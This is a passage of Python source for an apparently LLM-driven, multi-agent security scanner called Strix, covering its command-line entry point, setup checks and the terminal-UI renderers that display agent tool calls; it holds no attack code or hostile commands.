logging.getLogger().setLevel(logging.ERROR)
def format_token_count(count: float) -> str:
count = int(count)
if count >= 1_000_000:
return f"{count / 1_000_000:.1f}M"
if count >= 1_000:
return f"{count / 1_000:.1f}K"
return str(count)
def validate_environment() -> None:
console = Console()
missing_required_vars = []
missing_optional_vars = []
if not os.getenv("STRIX_LLM"):
missing_required_vars.append("STRIX_LLM")
if not os.getenv("LLM_API_KEY"):
missing_required_vars.append("LLM_API_KEY")
if not os.getenv("PERPLEXITY_API_KEY"):
missing_optional_vars.append("PERPLEXITY_API_KEY")
if missing_required_vars:
error_text = Text()
error_text.append("", style="bold red")
error_text.append("MISSING REQUIRED ENVIRONMENT VARIABLES", style="bold red")
error_text.append("\n\n", style="white")
for var in missing_required_vars:
error_text.append(f"{var}", style="bold yellow")
error_text.append(" is not set\n", style="white")
if missing_optional_vars:
error_text.append(
"\nOptional (but recommended) environment variables:\n", style="dim white"
)
for var in missing_optional_vars:
error_text.append(f"{var}", style="dim yellow")
error_text.append(" is not set\n", style="dim white")
error_text.append("\nRequired environment variables:\n", style="white")
error_text.append("", style="white")
error_text.append("STRIX_LLM", style="bold cyan")
error_text.append(
" - Model name to use with litellm (e.g., 'anthropic/claude-sonnet-4-20250514')\n",
style="white",
)
error_text.append("", style="white")
error_text.append("LLM_API_KEY", style="bold cyan")
error_text.append(" - API key for the LLM provider\n", style="white")
if missing_optional_vars:
error_text.append("\nOptional environment variables:\n", style="white")
error_text.append("", style="white")
error_text.append("PERPLEXITY_API_KEY", style="bold cyan")
error_text.append(
" - API key for Perplexity AI web search (enables real-time research)\n",
style="white",
)
error_text.append("\nExample setup:\n", style="white")
error_text.append(
"export STRIX_LLM='anthropic/claude-sonnet-4-20250514'\n", style="dim white"
)
error_text.append("export LLM_API_KEY='your-api-key-here'\n", style="dim white")
if missing_optional_vars:
error_text.append(
"export PERPLEXITY_API_KEY='your-perplexity-key-here'", style="dim white"
)
panel = Panel(
error_text,
title="[bold red]🛡️ STRIX CONFIGURATION ERROR",
title_align="center",
border_style="red",
padding=(1, 2),
)
console.print("\n")
console.print(panel)
console.print()
sys.exit(1)
def _validate_llm_response(response: Any) -> None:
if not response or not response.choices or not response.choices[0].message.content:
raise RuntimeError("Invalid response from LLM")
async def warm_up_llm() -> None:
console = Console()
try:
model_name = os.getenv("STRIX_LLM", "anthropic/claude-sonnet-4-20250514")
api_key = os.getenv("LLM_API_KEY")
if api_key:
litellm.api_key = api_key
test_messages = [
{"role": "system", "content": "You are a helpful assistant."},
{"role": "user", "content": "Reply with just 'OK'."},
]
response = litellm.completion(
model=model_name,
messages=test_messages,
max_tokens=10,
)
_validate_llm_response(response)
except Exception as e: # noqa: BLE001
error_text = Text()
error_text.append("", style="bold red")
error_text.append("LLM CONNECTION FAILED", style="bold red")
error_text.append("\n\n", style="white")
error_text.append("Could not establish connection to the language model.\n", style="white")
error_text.append("Please check your configuration and try again.\n", style="white")
error_text.append(f"\nError: {e}", style="dim white")
panel = Panel(
error_text,
title="[bold red]🛡️ STRIX STARTUP ERROR",
title_align="center",
border_style="red",
padding=(1, 2),
)
console.print("\n")
console.print(panel)
console.print()
sys.exit(1)
def generate_run_name() -> str:
# fmt: off
adjectives = [
"stealthy", "sneaky", "crafty", "elite", "phantom", "shadow", "silent",
"rogue", "covert", "ninja", "ghost", "cyber", "digital", "binary",
"encrypted", "obfuscated", "masked", "cloaked", "invisible", "anonymous"
]
nouns = [
"exploit", "payload", "backdoor", "rootkit", "keylogger", "botnet", "trojan",
"worm", "virus", "packet", "buffer", "shell", "daemon", "spider", "crawler",
"scanner", "sniffer", "honeypot", "firewall", "breach"
]
# fmt: on
adj = secrets.choice(adjectives)
noun = secrets.choice(nouns)
number = secrets.randbelow(900) + 100
return f"{adj}-{noun}-{number}"
def infer_target_type(target: str) -> tuple[str, dict[str, str]]:
if not target or not isinstance(target, str):
raise ValueError("Target must be a non-empty string")
target = target.strip()
parsed = urlparse(target)
if parsed.scheme in ("http", "https"):
if any(
host in parsed.netloc.lower() for host in ["github.com", "gitlab.com", "bitbucket.org"]
):
return "repository", {"target_repo": target}
return "web_application", {"target_url": target}
path = Path(target)
try:
if path.exists():
if path.is_dir():
return "local_code", {"target_path": str(path.absolute())}
raise ValueError(f"Path exists but is not a directory: {target}")
except (OSError, RuntimeError) as e:
raise ValueError(f"Invalid path: {target} - {e!s}") from e
if target.startswith("git@") or target.endswith(".git"):
return "repository", {"target_repo": target}
if "." in target and "/" not in target and not target.startswith("."):
parts = target.split(".")
if len(parts) >= 2 and all(p and p.strip() for p in parts):
return "web_application", {"target_url": f"https://{target}"}
raise ValueError(
f"Invalid target: {target}\n"
"Target must be one of:\n"
"- A valid URL (http:// or https://)\n"
"- A Git repository URL (https://github.com/... or git@github.com:...)\n"
"- A local directory path\n"
"- A domain name (e.g., example.com)"
)
def parse_arguments() -> argparse.Namespace:
parser = argparse.ArgumentParser(
description="Strix Multi-Agent Cybersecurity Scanner",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Examples:
# Web application scan
strix --target https://example.com
# GitHub repository analysis
strix --target https://github.com/user/repo
strix --target git@github.com:user/repo.git
# Local code analysis
strix --target ./my-project
# Domain scan
strix --target example.com
# Custom instructions
strix --target example.com --instruction "Focus on authentication vulnerabilities"
""",
)
parser.add_argument(
"--target",
type=str,
required=True,
help="Target to scan (URL, repository, local directory path, or domain name)",
)
parser.add_argument(
"--instruction",
type=str,
help="Custom instructions for the scan. This can be "
"specific vulnerability types to focus on (e.g., 'Focus on IDOR and XSS'), "
"testing approaches (e.g., 'Perform thorough authentication testing'), "
"test credentials (e.g., 'Use the following credentials to access the app: "
"admin:password123'), "
"or areas of interest (e.g., 'Check login API endpoint for security issues')",
)
parser.add_argument(
"--run-name",
type=str,
help="Custom name for this scan run",
)
args = parser.parse_args()
try:
args.target_type, args.target_dict = infer_target_type(args.target)
except ValueError as e:
parser.error(str(e))
return args
def _build_stats_text(tracer: Any) -> Text:
stats_text = Text()
if not tracer:
return stats_text
vuln_count = len(tracer.vulnerability_reports)
tool_count = tracer.get_real_tool_count()
agent_count = len(tracer.agents)
if vuln_count > 0:
stats_text.append("🔍 Vulnerabilities Found: ", style="bold red")
stats_text.append(str(vuln_count), style="bold yellow")
stats_text.append("", style="dim white")
stats_text.append("🤖 Agents Used: ", style="bold cyan")
stats_text.append(str(agent_count), style="bold white")
stats_text.append("", style="dim white")
stats_text.append("🛠️ Tools Called: ", style="bold cyan")
stats_text.append(str(tool_count), style="bold white")
return stats_text
def _build_llm_stats_text(tracer: Any) -> Text:
llm_stats_text = Text()
if not tracer:
return llm_stats_text
llm_stats = tracer.get_total_llm_stats()
total_stats = llm_stats["total"]
if total_stats["requests"] > 0:
llm_stats_text.append("📥 Input Tokens: ", style="bold cyan")
llm_stats_text.append(format_token_count(total_stats["input_tokens"]), style="bold white")
if total_stats["cached_tokens"] > 0:
llm_stats_text.append("", style="dim white")
llm_stats_text.append("⚡ Cached: ", style="bold green")
llm_stats_text.append(
format_token_count(total_stats["cached_tokens"]), style="bold green"
)
llm_stats_text.append("", style="dim white")
llm_stats_text.append("📤 Output Tokens: ", style="bold cyan")
llm_stats_text.append(format_token_count(total_stats["output_tokens"]), style="bold white")
if total_stats["cost"] > 0:
llm_stats_text.append("", style="dim white")
llm_stats_text.append("💰 Total Cost: $", style="bold cyan")
llm_stats_text.append(f"{total_stats['cost']:.4f}", style="bold yellow")
return llm_stats_text
def display_completion_message(args: argparse.Namespace, results_path: Path) -> None:
console = Console()
tracer = get_global_tracer()
target_value = next(iter(args.target_dict.values())) if args.target_dict else args.target
completion_text = Text()
completion_text.append("🦉 ", style="bold white")
completion_text.append("AGENT FINISHED", style="bold green")
completion_text.append("", style="dim white")
completion_text.append("Security assessment completed", style="white")
stats_text = _build_stats_text(tracer)
llm_stats_text = _build_llm_stats_text(tracer)
target_text = Text()
target_text.append("🎯 Target: ", style="bold cyan")
target_text.append(str(target_value), style="bold white")
results_text = Text()
results_text.append("📊 Results Saved To: ", style="bold cyan")
results_text.append(str(results_path), style="bold yellow")
if stats_text.plain:
if llm_stats_text.plain:
panel_content = Text.assemble(
completion_text,
"\n\n",
target_text,
"\n",
stats_text,
"\n",
llm_stats_text,
"\n",
results_text,
)
else:
panel_content = Text.assemble(
completion_text, "\n\n", target_text, "\n", stats_text, "\n", results_text
)
elif llm_stats_text.plain:
panel_content = Text.assemble(
completion_text, "\n\n", target_text, "\n", llm_stats_text, "\n", results_text
)
else:
panel_content = Text.assemble(completion_text, "\n\n", target_text, "\n", results_text)
panel = Panel(
panel_content,
title="[bold green]🛡️ STRIX CYBERSECURITY AGENT",
title_align="center",
border_style="green",
padding=(1, 2),
)
console.print("\n")
console.print(panel)
console.print()
def _check_docker_connection() -> Any:
try:
return docker.from_env()
except DockerException:
console = Console()
error_text = Text()
error_text.append("", style="bold red")
error_text.append("DOCKER NOT AVAILABLE", style="bold red")
error_text.append("\n\n", style="white")
error_text.append("Cannot connect to Docker daemon.\n", style="white")
error_text.append("Please ensure Docker is installed and running.\n\n", style="white")
error_text.append("Try running: ", style="dim white")
error_text.append("sudo systemctl start docker", style="dim cyan")
panel = Panel(
error_text,
title="[bold red]🛡️ STRIX STARTUP ERROR",
title_align="center",
border_style="red",
padding=(1, 2),
)
console.print("\n", panel, "\n")
sys.exit(1)
def _image_exists(client: Any) -> bool:
try:
client.images.get(STRIX_IMAGE)
except docker.errors.ImageNotFound:
return False
else:
return True
def _update_layer_status(layers_info: dict[str, str], layer_id: str, layer_status: str) -> None:
    # Record a per-layer state; "done" is what the progress counter below looks for.
    if "Pull complete" in layer_status or "Already exists" in layer_status:
        layers_info[layer_id] = "done"
    elif "Downloading" in layer_status:
        layers_info[layer_id] = "downloading"
    elif "Extracting" in layer_status:
        layers_info[layer_id] = "extracting"
    elif "Waiting" in layer_status:
        layers_info[layer_id] = "waiting"
    else:
        layers_info[layer_id] = "unknown"
def _process_pull_line(
    line: dict[str, Any], layers_info: dict[str, str], status: Any, last_update: str
) -> str:
    if "id" in line and "status" in line:
        layer_id = line["id"]
        _update_layer_status(layers_info, layer_id, line["status"])
        completed = sum(1 for v in layers_info.values() if v == "done")
total = len(layers_info)
if total > 0:
update_msg = f"[bold cyan]Progress: {completed}/{total} layers complete"
if update_msg != last_update:
status.update(update_msg)
return update_msg
elif "status" in line and "id" not in line:
global_status = line["status"]
if "Pulling from" in global_status:
status.update("[bold cyan]Fetching image manifest...")
elif "Digest:" in global_status:
status.update("[bold cyan]Verifying image...")
elif "Status:" in global_status:
status.update("[bold cyan]Finalizing...")
return last_update
def pull_docker_image() -> None:
console = Console()
client = _check_docker_connection()
if _image_exists(client):
return
console.print()
console.print(f"[bold cyan]🐳 Pulling Docker image:[/bold cyan] {STRIX_IMAGE}")
console.print(
"[dim yellow]This only happens on first run and may take a few minutes...[/dim yellow]"
)
console.print()
with console.status("[bold cyan]Downloading image layers...", spinner="dots") as status:
try:
layers_info: dict[str, str] = {}
last_update = ""
for line in client.api.pull(STRIX_IMAGE, stream=True, decode=True):
last_update = _process_pull_line(line, layers_info, status, last_update)
except DockerException as e:
console.print()
error_text = Text()
error_text.append("", style="bold red")
error_text.append("FAILED TO PULL IMAGE", style="bold red")
error_text.append("\n\n", style="white")
error_text.append(f"Could not download: {STRIX_IMAGE}\n", style="white")
error_text.append(str(e), style="dim red")
panel = Panel(
error_text,
title="[bold red]🛡️ DOCKER PULL ERROR",
title_align="center",
border_style="red",
padding=(1, 2),
)
console.print(panel, "\n")
sys.exit(1)
success_text = Text()
success_text.append("", style="bold green")
success_text.append("Successfully pulled Docker image", style="green")
console.print(success_text)
console.print()
def main() -> None:
if sys.platform == "win32":
asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())
pull_docker_image()
validate_environment()
asyncio.run(warm_up_llm())
args = parse_arguments()
if not args.run_name:
args.run_name = generate_run_name()
asyncio.run(run_strix_cli(args))
results_path = Path("agent_runs") / args.run_name
display_completion_message(args, results_path)
if __name__ == "__main__":
main()
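`format_token_count` above compresses raw token totals into `K`/`M` suffixes for the completion panel; pulled out as a standalone snippet (an illustrative copy of the same logic, not a new implementation), it behaves like this:

```python
def format_token_count(count: float) -> str:
    # Collapse large token counts into "1.5M" / "2.5K" style strings.
    count = int(count)
    if count >= 1_000_000:
        return f"{count / 1_000_000:.1f}M"
    if count >= 1_000:
        return f"{count / 1_000:.1f}K"
    return str(count)

print(format_token_count(1_500_000))  # → 1.5M
print(format_token_count(2_500))      # → 2.5K
print(format_token_count(999))        # → 999
```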


@@ -0,0 +1,39 @@
from . import (
agents_graph_renderer,
browser_renderer,
file_edit_renderer,
finish_renderer,
notes_renderer,
proxy_renderer,
python_renderer,
reporting_renderer,
scan_info_renderer,
terminal_renderer,
thinking_renderer,
user_message_renderer,
web_search_renderer,
)
from .base_renderer import BaseToolRenderer
from .registry import ToolTUIRegistry, get_tool_renderer, register_tool_renderer, render_tool_widget
__all__ = [
"BaseToolRenderer",
"ToolTUIRegistry",
"agents_graph_renderer",
"browser_renderer",
"file_edit_renderer",
"finish_renderer",
"get_tool_renderer",
"notes_renderer",
"proxy_renderer",
"python_renderer",
"register_tool_renderer",
"render_tool_widget",
"reporting_renderer",
"scan_info_renderer",
"terminal_renderer",
"thinking_renderer",
"user_message_renderer",
"web_search_renderer",
]
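`registry.py` itself is not part of this hunk; the decorator-based registry implied by `register_tool_renderer` and `get_tool_renderer` can be sketched as follows. The internals here (the `_RENDERERS` dict, the exact signatures) are assumptions for illustration, not the actual module:

```python
from typing import Optional

# Hypothetical sketch of the renderer registry; the real registry.py may differ.
_RENDERERS: dict[str, type] = {}


def register_tool_renderer(cls: type) -> type:
    # Class decorator: index each renderer class by its declared tool_name.
    _RENDERERS[cls.tool_name] = cls
    return cls


def get_tool_renderer(tool_name: str) -> Optional[type]:
    return _RENDERERS.get(tool_name)


@register_tool_renderer
class EchoRenderer:
    tool_name = "echo"


print(get_tool_renderer("echo") is EchoRenderer)  # → True
```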


@@ -0,0 +1,129 @@
from typing import Any, ClassVar
from textual.widgets import Static
from .base_renderer import BaseToolRenderer
from .registry import register_tool_renderer
@register_tool_renderer
class ViewAgentGraphRenderer(BaseToolRenderer):
tool_name: ClassVar[str] = "view_agent_graph"
css_classes: ClassVar[list[str]] = ["tool-call", "agents-graph-tool"]
@classmethod
def render(cls, tool_data: dict[str, Any]) -> Static: # noqa: ARG003
content_text = "🕸️ [bold #fbbf24]Viewing agents graph[/]"
css_classes = cls.get_css_classes("completed")
return Static(content_text, classes=css_classes)
@register_tool_renderer
class CreateAgentRenderer(BaseToolRenderer):
tool_name: ClassVar[str] = "create_agent"
css_classes: ClassVar[list[str]] = ["tool-call", "agents-graph-tool"]
@classmethod
def render(cls, tool_data: dict[str, Any]) -> Static:
args = tool_data.get("args", {})
task = args.get("task", "")
name = args.get("name", "Agent")
header = f"🤖 [bold #fbbf24]Creating {name}[/]"
if task:
task_display = task[:400] + "..." if len(task) > 400 else task
content_text = f"{header}\n [dim]{cls.escape_markup(task_display)}[/]"
else:
content_text = f"{header}\n [dim]Spawning agent...[/]"
css_classes = cls.get_css_classes("completed")
return Static(content_text, classes=css_classes)
@register_tool_renderer
class SendMessageToAgentRenderer(BaseToolRenderer):
tool_name: ClassVar[str] = "send_message_to_agent"
css_classes: ClassVar[list[str]] = ["tool-call", "agents-graph-tool"]
@classmethod
def render(cls, tool_data: dict[str, Any]) -> Static:
args = tool_data.get("args", {})
message = args.get("message", "")
header = "💬 [bold #fbbf24]Sending message[/]"
if message:
message_display = message[:400] + "..." if len(message) > 400 else message
content_text = f"{header}\n [dim]{cls.escape_markup(message_display)}[/]"
else:
content_text = f"{header}\n [dim]Sending...[/]"
css_classes = cls.get_css_classes("completed")
return Static(content_text, classes=css_classes)
@register_tool_renderer
class AgentFinishRenderer(BaseToolRenderer):
tool_name: ClassVar[str] = "agent_finish"
css_classes: ClassVar[list[str]] = ["tool-call", "agents-graph-tool"]
@classmethod
def render(cls, tool_data: dict[str, Any]) -> Static:
args = tool_data.get("args", {})
result_summary = args.get("result_summary", "")
findings = args.get("findings", [])
success = args.get("success", True)
header = (
"🏁 [bold #fbbf24]Agent completed[/]" if success else "🏁 [bold #fbbf24]Agent failed[/]"
)
if result_summary:
summary_display = (
result_summary[:400] + "..." if len(result_summary) > 400 else result_summary
)
content_parts = [f"{header}\n [bold]{cls.escape_markup(summary_display)}[/]"]
if findings and isinstance(findings, list):
finding_lines = [f"{finding}" for finding in findings[:3]]
if len(findings) > 3:
finding_lines.append(f"• ... +{len(findings) - 3} more findings")
content_parts.append(
f" [dim]{chr(10).join([cls.escape_markup(line) for line in finding_lines])}[/]"
)
content_text = "\n".join(content_parts)
else:
content_text = f"{header}\n [dim]Completing task...[/]"
css_classes = cls.get_css_classes("completed")
return Static(content_text, classes=css_classes)
@register_tool_renderer
class WaitForMessageRenderer(BaseToolRenderer):
tool_name: ClassVar[str] = "wait_for_message"
css_classes: ClassVar[list[str]] = ["tool-call", "agents-graph-tool"]
@classmethod
def render(cls, tool_data: dict[str, Any]) -> Static:
args = tool_data.get("args", {})
reason = args.get("reason", "Waiting for messages from other agents or user input")
header = "⏸️ [bold #fbbf24]Waiting for messages[/]"
if reason:
reason_display = reason[:400] + "..." if len(reason) > 400 else reason
content_text = f"{header}\n [dim]{cls.escape_markup(reason_display)}[/]"
else:
content_text = f"{header}\n [dim]Agent paused until message received...[/]"
css_classes = cls.get_css_classes("completed")
return Static(content_text, classes=css_classes)


@@ -0,0 +1,61 @@
from abc import ABC, abstractmethod
from typing import Any, ClassVar
from textual.widgets import Static
class BaseToolRenderer(ABC):
tool_name: ClassVar[str] = ""
css_classes: ClassVar[list[str]] = ["tool-call"]
@classmethod
@abstractmethod
def render(cls, tool_data: dict[str, Any]) -> Static:
pass
@classmethod
def escape_markup(cls, text: str) -> str:
return text.replace("[", "\\[").replace("]", "\\]")
@classmethod
def format_args(cls, args: dict[str, Any], max_length: int = 500) -> str:
if not args:
return ""
args_parts = []
for k, v in args.items():
str_v = str(v)
if len(str_v) > max_length:
str_v = str_v[: max_length - 3] + "..."
args_parts.append(f" [dim]{k}:[/] {cls.escape_markup(str_v)}")
return "\n".join(args_parts)
@classmethod
def format_result(cls, result: Any, max_length: int = 1000) -> str:
if result is None:
return ""
str_result = str(result).strip()
if not str_result:
return ""
if len(str_result) > max_length:
str_result = str_result[: max_length - 3] + "..."
return cls.escape_markup(str_result)
@classmethod
def get_status_icon(cls, status: str) -> str:
status_icons = {
"running": "[#f59e0b]●[/#f59e0b] In progress...",
"completed": "[#22c55e]✓[/#22c55e] Done",
"failed": "[#dc2626]✗[/#dc2626] Failed",
"error": "[#dc2626]✗[/#dc2626] Error",
}
return status_icons.get(status, "[dim]○[/dim] Unknown")
@classmethod
def get_css_classes(cls, status: str) -> str:
base_classes = cls.css_classes.copy()
base_classes.append(f"status-{status}")
return " ".join(base_classes)
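The string helpers on `BaseToolRenderer` have no Textual dependency; extracted as plain functions (a sketch for illustration, with `get_css_classes` taking the base class list as an argument instead of reading a `ClassVar`), they work like this:

```python
def escape_markup(text: str) -> str:
    # Escape Rich/Textual markup brackets so user text renders literally.
    return text.replace("[", "\\[").replace("]", "\\]")


def get_css_classes(base: list[str], status: str) -> str:
    # Append a status-<state> class to the renderer's base classes.
    classes = base.copy()
    classes.append(f"status-{status}")
    return " ".join(classes)


print(escape_markup("[bold]hi[/bold]"))           # → \[bold\]hi\[/bold\]
print(get_css_classes(["tool-call"], "running"))  # → tool-call status-running
```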


@@ -0,0 +1,107 @@
from typing import Any, ClassVar
from textual.widgets import Static
from .base_renderer import BaseToolRenderer
from .registry import register_tool_renderer
@register_tool_renderer
class BrowserRenderer(BaseToolRenderer):
tool_name: ClassVar[str] = "browser_action"
css_classes: ClassVar[list[str]] = ["tool-call", "browser-tool"]
@classmethod
def render(cls, tool_data: dict[str, Any]) -> Static:
args = tool_data.get("args", {})
status = tool_data.get("status", "unknown")
action = args.get("action", "unknown")
content = cls._build_sleek_content(action, args)
css_classes = cls.get_css_classes(status)
return Static(content, classes=css_classes)
@classmethod
def _build_sleek_content(cls, action: str, args: dict[str, Any]) -> str:
browser_icon = "🌐"
url = args.get("url")
text = args.get("text")
js_code = args.get("js_code")
if action in [
"launch",
"goto",
"new_tab",
"type",
"execute_js",
"click",
"double_click",
"hover",
]:
if action == "launch":
display_url = cls._format_url(url) if url else None
message = (
f"launching {display_url} on browser" if display_url else "launching browser"
)
elif action == "goto":
display_url = cls._format_url(url) if url else None
message = f"navigating to {display_url}" if display_url else "navigating"
elif action == "new_tab":
display_url = cls._format_url(url) if url else None
message = f"opening tab {display_url}" if display_url else "opening tab"
elif action == "type":
display_text = cls._format_text(text) if text else None
message = f"typing {display_text}" if display_text else "typing"
elif action == "execute_js":
display_js = cls._format_js(js_code) if js_code else None
message = (
f"executing javascript\n{display_js}" if display_js else "executing javascript"
)
else:
action_words = {
"click": "clicking",
"double_click": "double clicking",
"hover": "hovering",
}
message = action_words[action]
return f"{browser_icon} [#06b6d4]{message}[/]"
simple_actions = {
"back": "going back in browser history",
"forward": "going forward in browser history",
"refresh": "refreshing browser tab",
"close_tab": "closing browser tab",
"switch_tab": "switching browser tab",
"list_tabs": "listing browser tabs",
"view_source": "viewing page source",
"screenshot": "taking screenshot of browser tab",
"wait": "waiting...",
"close": "closing browser",
}
if action in simple_actions:
return f"{browser_icon} [#06b6d4]{simple_actions[action]}[/]"
return f"{browser_icon} [#06b6d4]{action}[/]"
@classmethod
def _format_url(cls, url: str) -> str:
if len(url) > 300:
url = url[:297] + "..."
return cls.escape_markup(url)
@classmethod
def _format_text(cls, text: str) -> str:
if len(text) > 200:
text = text[:197] + "..."
return cls.escape_markup(text)
@classmethod
def _format_js(cls, js_code: str) -> str:
if len(js_code) > 200:
js_code = js_code[:197] + "..."
return f"[white]{cls.escape_markup(js_code)}[/white]"
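The three `_format_*` helpers above repeat one truncate-then-ellipsize pattern with different limits (300 for URLs, 200 for text and JS); a generic version might look like this (hypothetical refactor, not present in the source):

```python
def truncate(text: str, limit: int) -> str:
    # Keep the result at most `limit` characters, marking the cut with "...".
    if len(text) > limit:
        return text[: limit - 3] + "..."
    return text


print(truncate("a" * 10, 8))  # → aaaaa...
print(truncate("short", 8))   # → short
```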


@@ -0,0 +1,95 @@
from typing import Any, ClassVar
from textual.widgets import Static
from .base_renderer import BaseToolRenderer
from .registry import register_tool_renderer
@register_tool_renderer
class StrReplaceEditorRenderer(BaseToolRenderer):
tool_name: ClassVar[str] = "str_replace_editor"
css_classes: ClassVar[list[str]] = ["tool-call", "file-edit-tool"]
@classmethod
def render(cls, tool_data: dict[str, Any]) -> Static:
args = tool_data.get("args", {})
result = tool_data.get("result")
command = args.get("command", "")
path = args.get("path", "")
if command == "view":
header = "📖 [bold #10b981]Reading file[/]"
elif command == "str_replace":
header = "✏️ [bold #10b981]Editing file[/]"
elif command == "create":
header = "📝 [bold #10b981]Creating file[/]"
else:
header = "📄 [bold #10b981]File operation[/]"
if (result and isinstance(result, dict) and "content" in result) or path:
path_display = path[-60:] if len(path) > 60 else path
content_text = f"{header} [dim]{cls.escape_markup(path_display)}[/]"
else:
content_text = f"{header} [dim]Processing...[/]"
css_classes = cls.get_css_classes("completed")
return Static(content_text, classes=css_classes)
@register_tool_renderer
class ListFilesRenderer(BaseToolRenderer):
tool_name: ClassVar[str] = "list_files"
css_classes: ClassVar[list[str]] = ["tool-call", "file-edit-tool"]
@classmethod
def render(cls, tool_data: dict[str, Any]) -> Static:
args = tool_data.get("args", {})
path = args.get("path", "")
header = "📂 [bold #10b981]Listing files[/]"
if path:
path_display = path[-60:] if len(path) > 60 else path
content_text = f"{header} [dim]{cls.escape_markup(path_display)}[/]"
else:
content_text = f"{header} [dim]Current directory[/]"
css_classes = cls.get_css_classes("completed")
return Static(content_text, classes=css_classes)
@register_tool_renderer
class SearchFilesRenderer(BaseToolRenderer):
tool_name: ClassVar[str] = "search_files"
css_classes: ClassVar[list[str]] = ["tool-call", "file-edit-tool"]
@classmethod
def render(cls, tool_data: dict[str, Any]) -> Static:
args = tool_data.get("args", {})
path = args.get("path", "")
regex = args.get("regex", "")
header = "🔍 [bold purple]Searching files[/]"
if path and regex:
path_display = path[-30:] if len(path) > 30 else path
regex_display = regex[:30] if len(regex) > 30 else regex
content_text = (
f"{header} [dim]{cls.escape_markup(path_display)} for "
f"'{cls.escape_markup(regex_display)}'[/]"
)
elif path:
path_display = path[-60:] if len(path) > 60 else path
content_text = f"{header} [dim]{cls.escape_markup(path_display)}[/]"
elif regex:
regex_display = regex[:60] if len(regex) > 60 else regex
content_text = f"{header} [dim]'{cls.escape_markup(regex_display)}'[/]"
else:
content_text = f"{header} [dim]Searching...[/]"
css_classes = cls.get_css_classes("completed")
return Static(content_text, classes=css_classes)


@@ -0,0 +1,32 @@
from typing import Any, ClassVar
from textual.widgets import Static
from .base_renderer import BaseToolRenderer
from .registry import register_tool_renderer
@register_tool_renderer
class FinishScanRenderer(BaseToolRenderer):
tool_name: ClassVar[str] = "finish_scan"
css_classes: ClassVar[list[str]] = ["tool-call", "finish-tool"]
@classmethod
def render(cls, tool_data: dict[str, Any]) -> Static:
args = tool_data.get("args", {})
content = args.get("content", "")
success = args.get("success", True)
header = (
"🏁 [bold #dc2626]Finishing Scan[/]" if success else "🏁 [bold #dc2626]Scan Failed[/]"
)
if content:
content_display = content[:600] + "..." if len(content) > 600 else content
content_text = f"{header}\n [bold]{cls.escape_markup(content_display)}[/]"
else:
content_text = f"{header}\n [dim]Generating final report...[/]"
css_classes = cls.get_css_classes("completed")
return Static(content_text, classes=css_classes)


@@ -0,0 +1,108 @@
from typing import Any, ClassVar
from textual.widgets import Static
from .base_renderer import BaseToolRenderer
from .registry import register_tool_renderer
@register_tool_renderer
class CreateNoteRenderer(BaseToolRenderer):
tool_name: ClassVar[str] = "create_note"
css_classes: ClassVar[list[str]] = ["tool-call", "notes-tool"]
@classmethod
def render(cls, tool_data: dict[str, Any]) -> Static:
args = tool_data.get("args", {})
title = args.get("title", "")
content = args.get("content", "")
header = "📝 [bold #fbbf24]Note[/]"
if title:
title_display = title[:100] + "..." if len(title) > 100 else title
note_parts = [f"{header}\n [bold]{cls.escape_markup(title_display)}[/]"]
if content:
content_display = content[:200] + "..." if len(content) > 200 else content
note_parts.append(f" [dim]{cls.escape_markup(content_display)}[/]")
content_text = "\n".join(note_parts)
else:
content_text = f"{header}\n [dim]Creating note...[/]"
css_classes = cls.get_css_classes("completed")
return Static(content_text, classes=css_classes)
@register_tool_renderer
class DeleteNoteRenderer(BaseToolRenderer):
tool_name: ClassVar[str] = "delete_note"
css_classes: ClassVar[list[str]] = ["tool-call", "notes-tool"]
@classmethod
def render(cls, tool_data: dict[str, Any]) -> Static: # noqa: ARG003
header = "🗑️ [bold #fbbf24]Delete Note[/]"
content_text = f"{header}\n [dim]Deleting...[/]"
css_classes = cls.get_css_classes("completed")
return Static(content_text, classes=css_classes)
@register_tool_renderer
class UpdateNoteRenderer(BaseToolRenderer):
tool_name: ClassVar[str] = "update_note"
css_classes: ClassVar[list[str]] = ["tool-call", "notes-tool"]
@classmethod
def render(cls, tool_data: dict[str, Any]) -> Static:
args = tool_data.get("args", {})
title = args.get("title", "")
content = args.get("content", "")
header = "✏️ [bold #fbbf24]Update Note[/]"
if title or content:
note_parts = [header]
if title:
title_display = title[:100] + "..." if len(title) > 100 else title
note_parts.append(f" [bold]{cls.escape_markup(title_display)}[/]")
if content:
content_display = content[:200] + "..." if len(content) > 200 else content
note_parts.append(f" [dim]{cls.escape_markup(content_display)}[/]")
content_text = "\n".join(note_parts)
else:
content_text = f"{header}\n [dim]Updating...[/]"
css_classes = cls.get_css_classes("completed")
return Static(content_text, classes=css_classes)
@register_tool_renderer
class ListNotesRenderer(BaseToolRenderer):
tool_name: ClassVar[str] = "list_notes"
css_classes: ClassVar[list[str]] = ["tool-call", "notes-tool"]
@classmethod
def render(cls, tool_data: dict[str, Any]) -> Static:
result = tool_data.get("result")
header = "📋 [bold #fbbf24]Listing notes[/]"
if result and isinstance(result, dict) and "notes" in result:
notes = result["notes"]
if isinstance(notes, list):
count = len(notes)
content_text = f"{header}\n [dim]{count} notes found[/]"
else:
content_text = f"{header}\n [dim]No notes found[/]"
else:
content_text = f"{header}\n [dim]Listing notes...[/]"
css_classes = cls.get_css_classes("completed")
return Static(content_text, classes=css_classes)


@@ -0,0 +1,255 @@
from typing import Any, ClassVar
from textual.widgets import Static
from .base_renderer import BaseToolRenderer
from .registry import register_tool_renderer
@register_tool_renderer
class ListRequestsRenderer(BaseToolRenderer):
tool_name: ClassVar[str] = "list_requests"
css_classes: ClassVar[list[str]] = ["tool-call", "proxy-tool"]
@classmethod
def render(cls, tool_data: dict[str, Any]) -> Static:
args = tool_data.get("args", {})
result = tool_data.get("result")
httpql_filter = args.get("httpql_filter")
header = "📋 [bold #06b6d4]Listing requests[/]"
if result and isinstance(result, dict) and "requests" in result:
requests = result["requests"]
if isinstance(requests, list) and requests:
request_lines = []
for req in requests[:3]:
if isinstance(req, dict):
method = req.get("method", "?")
path = req.get("path", "?")
response = req.get("response") or {}
status = response.get("statusCode", "?")
                        line = f"{method} {path} -> {status}"
request_lines.append(line)
if len(requests) > 3:
request_lines.append(f"... +{len(requests) - 3} more")
escaped_lines = [cls.escape_markup(line) for line in request_lines]
content_text = f"{header}\n [dim]{chr(10).join(escaped_lines)}[/]"
else:
content_text = f"{header}\n [dim]No requests found[/]"
elif httpql_filter:
filter_display = (
httpql_filter[:300] + "..." if len(httpql_filter) > 300 else httpql_filter
)
content_text = f"{header}\n [dim]{cls.escape_markup(filter_display)}[/]"
else:
